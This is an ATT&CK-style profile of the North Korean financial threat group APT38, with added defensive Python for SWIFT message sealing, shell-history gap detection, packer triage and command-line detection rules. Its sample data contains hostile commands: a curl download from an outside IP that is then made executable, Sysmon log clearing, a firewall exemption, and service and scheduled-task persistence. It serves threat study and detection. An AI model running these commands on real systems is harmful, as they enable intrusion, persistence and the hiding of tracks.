
APT38

APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
ID: G0082
Associated Groups: NICKEL GLADSTONE, BeagleBoyz, Bluenoroff, Stardust Chollima
Version: 2.0
Created: 29 Jan 2019
Last Modified: 18 Jan 2022

Associated Group Descriptions

Name Description
NICKEL GLADSTONE (Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)
BeagleBoyz (Citation: CISA AA20-239A BeagleBoyz August 2020)
Bluenoroff (Citation: Kaspersky Lazarus Under The Hood Blog 2017)
Stardust Chollima (Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT38 has used PowerShell to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.003 Command and Scripting Interpreter: Windows Command Shell

APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.(Citation: FireEye APT38 Oct 2018)

.005 Command and Scripting Interpreter: Visual Basic

APT38 has used VBScript to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT38 has installed a new Windows service to establish persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1565 .001 Data Manipulation: Stored Data Manipulation

APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.(Citation: FireEye APT38 Oct 2018)

.002 Data Manipulation: Transmitted Data Manipulation

APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.(Citation: FireEye APT38 Oct 2018)

.003 Data Manipulation: Runtime Data Manipulation

APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.(Citation: FireEye APT38 Oct 2018)
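
The three DYEPACK behaviours above (altering or deleting stored SWIFT records, changing a message on its way to the confirmation printer, and altering the PDF view at read time) are all defeated by the same control: seal every outgoing message with an HMAC computed on a host the messaging interface cannot write to, then reconcile each downstream copy against those seals. The code below is an added example, not code from FireEye, SWIFT or SECURITM. The MT103-style text, the transaction references, the account labels and RECON_KEY are all constructed for the example; real messages carry many more fields and a block structure.

```python
"""Tamper-evident reconciliation of outgoing payment messages (added example)."""
import hashlib
import hmac

# Assumption: this key is held only by the reconciliation host, never by the
# messaging interface or its database server; DYEPACK-style access to that
# host would otherwise let the attacker re-seal the records it alters.
RECON_KEY = b"example-only-key-kept-on-reconciliation-host"

# Constructed originals, sealed at creation time (simplified MT103-style text).
ORIGINALS = [
    ":20:TRN0001\n:32A:160204USD1000000,00\n:50K:ACCT-A\n:59:ACCT-B",
    ":20:TRN0002\n:32A:160204USD2500000,00\n:50K:ACCT-A\n:59:ACCT-C",
    ":20:TRN0003\n:32A:160204USD750000,00\n:50K:ACCT-A\n:59:ACCT-D",
]

# Constructed downstream copy (print spool, database export or PDF text) after
# tampering: TRN0001 deleted, TRN0002 amount reduced, TRN0004 injected.
TAMPERED_COPY = [
    ":20:TRN0002\n:32A:160204USD250000,00\n:50K:ACCT-A\n:59:ACCT-C",
    ":20:TRN0003\n:32A:160204USD750000,00\n:50K:ACCT-A\n:59:ACCT-D",
    ":20:TRN0004\n:32A:160204USD900000,00\n:50K:ACCT-A\n:59:ACCT-E",
]


def parse_mt(text: str) -> dict:
    """Parse ':TAG:value' lines into a dict (simplified MT parsing)."""
    fields = {}
    for line in text.strip().splitlines():
        line = line.strip()
        if line.startswith(":"):
            tag, _, value = line[1:].partition(":")
            fields[tag] = value.strip()
    return fields


def canonical(fields: dict) -> bytes:
    """Deterministic encoding so the MAC does not depend on tag order or whitespace."""
    return "\n".join(f"{tag}={fields[tag]}" for tag in sorted(fields)).encode()


def seal(fields: dict) -> str:
    return hmac.new(RECON_KEY, canonical(fields), hashlib.sha256).hexdigest()


def build_ledger(messages) -> dict:
    """Seal each message when it is created; keyed by the :20: transaction reference."""
    ledger = {}
    for text in messages:
        fields = parse_mt(text)
        ledger[fields["20"]] = seal(fields)
    return ledger


def reconcile(ledger: dict, copies) -> list:
    """Compare any downstream copy set against the ledger; returns sorted (trn, finding)."""
    findings, seen = [], set()
    for text in copies:
        fields = parse_mt(text)
        trn = fields.get("20", "<no :20:>")
        seen.add(trn)
        if trn not in ledger:
            findings.append((trn, "unknown message, never sealed at creation"))
        elif not hmac.compare_digest(ledger[trn], seal(fields)):
            findings.append((trn, "content differs from sealed original"))
    for trn in ledger.keys() - seen:
        findings.append((trn, "missing from downstream copy"))
    return sorted(findings)


def demo() -> list:
    return reconcile(build_ledger(ORIGINALS), TAMPERED_COPY)


if __name__ == "__main__":
    for trn, finding in demo():
        print(trn, finding)
```

TRN0003 is untouched and produces no finding. The same reconcile() call works against the database export, the printer spool and text extracted from the viewed PDF, which is what makes it useful against all three DYEPACK variants: the attacker would have to alter the sealed ledger as well, and that sits on a host they do not control.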

Enterprise T1561 .002 Disk Wipe: Disk Structure Wipe

APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.(Citation: FireEye APT38 Oct 2018)

Enterprise T1562 .003 Impair Defenses: Impair Command History Logging

APT38 has prepended a space to its terminal commands so that, where the HISTCONTROL environment variable is set to ignorespace or ignoreboth, Bash does not record them in the shell history.(Citation: CISA AA20-239A BeagleBoyz August 2020)
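
Shell history is under the attacker's control, so hardening HISTCONTROL is not a detection. auditd's execve() records are written by the kernel regardless of how the shell was configured, which makes "commands that auditd saw but the history file does not contain" a workable triage list for this technique. The code below is an added example, not code from CISA or SECURITM; the auditd EXECVE lines and the .bash_history contents are constructed for the example (a0, a1, ... are the argv fields auditd writes, hex-encoded when an argument contains whitespace).

```python
"""Reconcile audited execve() calls against ~/.bash_history (added example)."""
import re

# Constructed auditd EXECVE records; a2 of record 1003 is hex for "chmod +x update.bin".
AUDIT_LOG = """
type=EXECVE msg=audit(1598400000.101:1001): argc=2 a0="ls" a1="-la"
type=EXECVE msg=audit(1598400005.202:1002): argc=3 a0="curl" a1="-sO" a2="http://203.0.113.5/update.bin"
type=EXECVE msg=audit(1598400009.303:1003): argc=3 a0="bash" a1="-c" a2=63686d6f64202b78207570646174652e62696e
type=EXECVE msg=audit(1598400012.404:1004): argc=1 a0="whoami"
"""

# Constructed history: the curl and bash -c lines were typed with a leading space
# under HISTCONTROL=ignoreboth, so Bash never wrote them.
BASH_HISTORY = """
ls -la
whoami
"""

# a<N>="quoted" or a<N>=HEX, as auditd emits them.
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def parse_execve(line: str):
    """Return the argv of one EXECVE record joined with spaces, or None."""
    if "type=EXECVE" not in line:
        return None
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        args[int(idx)] = quoted if quoted else bytes.fromhex(hexed).decode("utf-8", "replace")
    return " ".join(args[i] for i in sorted(args)) if args else None


def normalize(cmd: str) -> str:
    """Drop shell quotes and collapse whitespace so argv and history text compare."""
    return " ".join(cmd.replace("'", "").replace('"', "").split())


def unhistoried_commands(audit_log: str, history: str) -> list:
    """Commands auditd recorded that are absent from the user's history file."""
    known = {normalize(l) for l in history.splitlines() if l.strip()}
    missing = []
    for line in audit_log.splitlines():
        cmd = parse_execve(line)
        if cmd and normalize(cmd) not in known:
            missing.append(cmd)
    return missing


if __name__ == "__main__":
    for cmd in unhistoried_commands(AUDIT_LOG, BASH_HISTORY):
        print("in audit log but not in history:", cmd)
```

In practice scope the audit records by auid and tty from the paired SYSCALL record, because processes spawned by scripts, cron jobs and non-interactive shells also never reach a history file; the output is a list to review, not an alert on its own.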

.004 Impair Defenses: Disable or Modify System Firewall

APT38 has created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT38 clears Windows Event Logs and Sysmon logs from the system.(Citation: FireEye APT38 Oct 2018)

.004 Indicator Removal: File Deletion

APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)

.006 Indicator Removal: Timestomp

APT38 has modified file timestamps so that they match those of other files in the same folder on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1056 .001 Input Capture: Keylogging

APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.(Citation: FireEye APT38 Oct 2018)

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.(Citation: FireEye APT38 Oct 2018)
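
Triage for the packers named above usually starts with two cheap signals: section names the packers are known to create, and per-section entropy, since packed or encrypted code sits near 8 bits per byte. The code below is an added example, not code from FireEye or SECURITM, and walks the PE headers by hand so it needs no third-party parser. build_test_pe() produces a constructed, minimal PE container that is parseable but not loadable; the section-name table lists only names with well-documented packer associations (Themida, VMProtect, Enigma Protector) and is deliberately partial, so the entropy test is the primary signal.

```python
"""Packer triage of PE sections by name and entropy (added example)."""
import math
import random
import struct
from collections import Counter

# Section names these packers are known to create (partial list, lower-cased).
PACKER_SECTIONS = {
    ".themida": "Themida",
    ".vmp0": "VMProtect", ".vmp1": "VMProtect", ".vmp2": "VMProtect",
    ".enigma1": "Enigma Protector", ".enigma2": "Enigma Protector",
}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; packed or encrypted data sits near 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(blob: bytes):
    """Yield (name, raw_bytes) for each section by walking the PE headers."""
    if blob[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    nsections = struct.unpack_from("<H", blob, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", blob, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # 4-byte signature + 20-byte COFF header
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), blob[raw_ptr:raw_ptr + raw_size]


def packer_indicators(blob: bytes, threshold: float = 7.0) -> list:
    """Return (section, reason) for sections with packer names or high entropy."""
    findings = []
    for name, data in pe_sections(blob):
        reasons = []
        if name.lower() in PACKER_SECTIONS:
            reasons.append(f"section name used by {PACKER_SECTIONS[name.lower()]}")
        h = entropy(data)
        if h >= threshold:
            reasons.append(f"entropy {h:.2f} >= {threshold}")
        if reasons:
            findings.append((name, "; ".join(reasons)))
    return findings


def build_test_pe(sections) -> bytes:
    """Constructed minimal PE container (DOS header, PE signature, COFF header,
    zeroed optional header, section table, 512-byte aligned raw data)."""
    e_lfanew, opt_size = 0x40, 0xE0
    headers_end = e_lfanew + 24 + opt_size + 40 * len(sections)
    raw_ptr = (headers_end + 0x1FF) & ~0x1FF
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    table, body = bytearray(), bytearray()
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data), 0x1000,
                             len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    blob = bytes(dos) + coff + b"\0" * opt_size + bytes(table)
    return blob + b"\0" * (((headers_end + 0x1FF) & ~0x1FF) - len(blob)) + bytes(body)


def demo() -> list:
    """A plain .text section next to a Themida-named section of pseudo-random bytes."""
    rng = random.Random(1)
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    sample = build_test_pe([(".text", b"\x90" * 256 + b"\xc3"), (".themida", packed)])
    return packer_indicators(sample)


if __name__ == "__main__":
    for section, reason in demo():
        print(section, reason)
```

High entropy alone also fires on legitimately compressed resources and on signed installers, so treat it as a reason to unpack and look further rather than as a verdict; packers that rename or strip section names are exactly why the name table is secondary.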

Enterprise T1588 .002 Obtain Capabilities: Tool

APT38 has obtained and used open-source tools such as Mimikatz.(Citation: ESET Lazarus KillDisk April 2018)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT38 has conducted spearphishing campaigns using malicious email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1053 .003 Scheduled Task/Job: Cron

APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.005 Scheduled Task/Job: Scheduled Task

APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1505 .003 Server Software Component: Web Shell

APT38 has used web shells for persistence or to ensure redundant access.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1218 .001 System Binary Proxy Execution: Compiled HTML File

APT38 has used CHM files to move concealed payloads.(Citation: Kaspersky Lazarus Under The Hood APR 2017)

.011 System Binary Proxy Execution: Rundll32

APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1569 .002 System Services: Service Execution

APT38 has created new services or modified existing ones to run executables, commands, or scripts.(Citation: CISA AA20-239A BeagleBoyz August 2020)
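
Several of the Windows-side entries above (the new service, the firewall exemptions on ports 443, 6443, 8443 and 9443, the cleared Windows and Sysmon logs, the startup scheduled task, and rundll32 proxy execution) all leave a command line behind when done with built-in tools. The code below is an added example, not code from CISA or SECURITM: it runs a small set of heuristic rules over constructed process-creation records shaped like Sysmon Event ID 1 (only the EventRecordID and CommandLine fields are used); the patterns, the port list and the six sample command lines are the example's own.

```python
"""Command-line detections for APT38-style Windows tradecraft (added example)."""
import re

# Ports named in the CISA advisory for APT38's firewall exemptions.
APT38_PORTS = {"443", "6443", "8443", "9443"}

# Constructed events: five malicious command lines and one benign rundll32 use.
EVENTS = [
    {"EventRecordID": 1, "CommandLine": 'netsh advfirewall firewall add rule name="Update Svc" dir=in action=allow protocol=TCP localport=6443'},
    {"EventRecordID": 2, "CommandLine": 'wevtutil.exe cl "Microsoft-Windows-Sysmon/Operational"'},
    {"EventRecordID": 3, "CommandLine": 'sc create WinUpdSvc binPath= "C:\\Users\\Public\\svc.exe" start= auto'},
    {"EventRecordID": 4, "CommandLine": 'schtasks /create /tn "Updater" /sc onstart /ru SYSTEM /tr C:\\Users\\Public\\upd.exe'},
    {"EventRecordID": 5, "CommandLine": "rundll32.exe C:\\Users\\Public\\update.dat,Start"},
    {"EventRecordID": 6, "CommandLine": "rundll32.exe user32.dll,LockWorkStation"},
]


def _ports(spec: str) -> set:
    """Expand 'a,b-c' port specs as netsh and New-NetFirewallRule accept them."""
    out = set()
    for part in spec.split(","):
        if "-" in part:
            lo, hi = part.split("-", 1)
            out.update(str(p) for p in range(int(lo), int(hi) + 1))
        elif part:
            out.add(part)
    return out


def rule_firewall(low: str):
    netsh = "netsh" in low and "advfirewall" in low and "add rule" in low and "action=allow" in low
    ps = "new-netfirewallrule" in low and "-action allow" in low
    m = re.search(r"localport[=\s]+([\d,\-]+)", low) if (netsh or ps) else None
    hit = _ports(m.group(1)) & APT38_PORTS if m else set()
    return f"T1562.004 inbound allow rule on port(s) {','.join(sorted(hit))}" if hit else None


def rule_log_clear(low: str):
    if re.search(r"\bwevtutil(\.exe)?\b.*\b(cl|clear-log)\b", low) or "clear-eventlog" in low:
        return "T1070.001 %s cleared" % ("Sysmon operational log" if "sysmon" in low else "Windows event log")
    return None


def rule_service(low: str):
    if re.search(r"\bsc(\.exe)?\s+(create|config)\b", low) and "binpath=" in low:
        return "T1543.003/T1569.002 service created or reconfigured with sc"
    if "new-service" in low and "-binarypathname" in low:
        return "T1543.003 service created with New-Service"
    return None


def rule_schtask(low: str):
    if re.search(r"\bschtasks(\.exe)?\s+/create\b", low) and re.search(r"/sc\s+on(start|logon)|/ru\s+system", low):
        return "T1053.005 scheduled task at startup/logon or as SYSTEM"
    return None


def rule_rundll32(low: str):
    if not re.search(r"\brundll32(\.exe)?\b", low):
        return None
    if "control_rundll" in low or ".cpl" in low:
        return "T1218.011 rundll32 executing a Control Panel item"
    m = re.search(r'rundll32(?:\.exe)?"?\s+"?([^\s",]+)', low)
    if m and not m.group(1).endswith(".dll"):
        return "T1218.011 rundll32 loading a non-.dll path"
    return None


RULES = (rule_firewall, rule_log_clear, rule_service, rule_schtask, rule_rundll32)


def scan(events) -> list:
    """Return (EventRecordID, finding) for every rule that matches each event."""
    findings = []
    for ev in events:
        low = ev["CommandLine"].lower()
        for rule in RULES:
            hit = rule(low)
            if hit:
                findings.append((ev["EventRecordID"], hit))
    return findings


if __name__ == "__main__":
    for record_id, finding in scan(EVENTS):
        print(record_id, finding)
```

Command-line matching is evadable (obfuscation, direct API calls instead of sc or schtasks), so pair these rules with the Windows events that record the outcome rather than the command: Security 4946 (firewall rule added), Security 1102 (audit log cleared), System 7045 (new service installed) and Security 4698 (scheduled task created).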

Enterprise T1204 .002 User Execution: Malicious File

APT38 has attempted to lure victims into enabling malicious macros within email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Software

ID: S0039  Name: Net
References: (Citation: FireEye APT38 Oct 2018) (Citation: Microsoft Net Utility) (Citation: Savill 1999)
Techniques: Password Policy Discovery, Domain Groups, System Time Discovery, Domain Account, Local Account, System Service Discovery, Remote System Discovery, Network Share Discovery, System Network Connections Discovery, Network Share Connection Removal, Service Execution, Local Account, Local Groups, SMB/Windows Admin Shares, Domain Account

ID: S0376  Name: HOPLIGHT
References: (Citation: CISA AA20-239A BeagleBoyz August 2020) (Citation: US-CERT HOPLIGHT Apr 2019)
Techniques: Modify Registry, Fallback Channels, Query Registry, Proxy, Non-Standard Port, Commonly Used Port, Pass the Hash, File and Directory Discovery, Security Account Manager, Windows Command Shell, Exfiltration Over C2 Channel, Standard Encoding, System Information Discovery, Service Execution, Ingress Tool Transfer, Windows Management Instrumentation, Uncommonly Used Port, Disable or Modify System Firewall, System Time Discovery, Process Injection

ID: S0334  Name: DarkComet
References: (Citation: DarkKomet) (Citation: FireEye APT38 Oct 2018) (Citation: FYNLOS) (Citation: Fynloski) (Citation: Krademok) (Citation: Malwarebytes DarkComet March 2018) (Citation: TrendMicro DarkComet Sept 2014)
Techniques: Command and Scripting Interpreter, Clipboard Data, Video Capture, System Information Discovery, Ingress Tool Transfer, Process Discovery, Windows Command Shell, Disable or Modify System Firewall, Remote Desktop Protocol, Registry Run Keys / Startup Folder, Web Protocols, Audio Capture, Disable or Modify Tools, Software Packing, Modify Registry, Keylogging, System Owner/User Discovery, Match Legitimate Name or Location

ID: S0002  Name: Mimikatz
References: (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: FireEye APT38 Oct 2018)
Techniques: DCSync, Credentials from Password Stores, Rogue Domain Controller, Private Keys, SID-History Injection, Security Support Provider, Pass the Hash, Account Manipulation, Pass the Ticket, Credentials from Web Browsers, Golden Ticket, Security Account Manager, LSASS Memory, Silver Ticket, Windows Credential Manager, Steal or Forge Authentication Certificates, LSA Secrets

ID: S0607  Name: KillDisk
References: (Citation: ESEST Black Energy Jan 2016) (Citation: ESET Lazarus KillDisk April 2018) (Citation: KillDisk Ransomware) (Citation: Trend Micro KillDisk 1) (Citation: Trend Micro KillDisk 2)
Techniques: File and Directory Discovery, Native API, System Information Discovery, Shared Modules, Process Discovery, Obfuscated Files or Information, Service Stop, Clear Windows Event Logs, System Shutdown/Reboot, Disk Structure Wipe, Data Encrypted for Impact, File Deletion, Masquerade Task or Service, Access Token Manipulation, Data Destruction

ID: S0593  Name: ECCENTRICBANDWAGON
References: (Citation: CISA AA20-239A BeagleBoyz August 2020) (Citation: CISA EB Aug 2020)
Techniques: File Deletion, Obfuscated Files or Information, Windows Command Shell, Screen Capture, Keylogging, Local Data Staging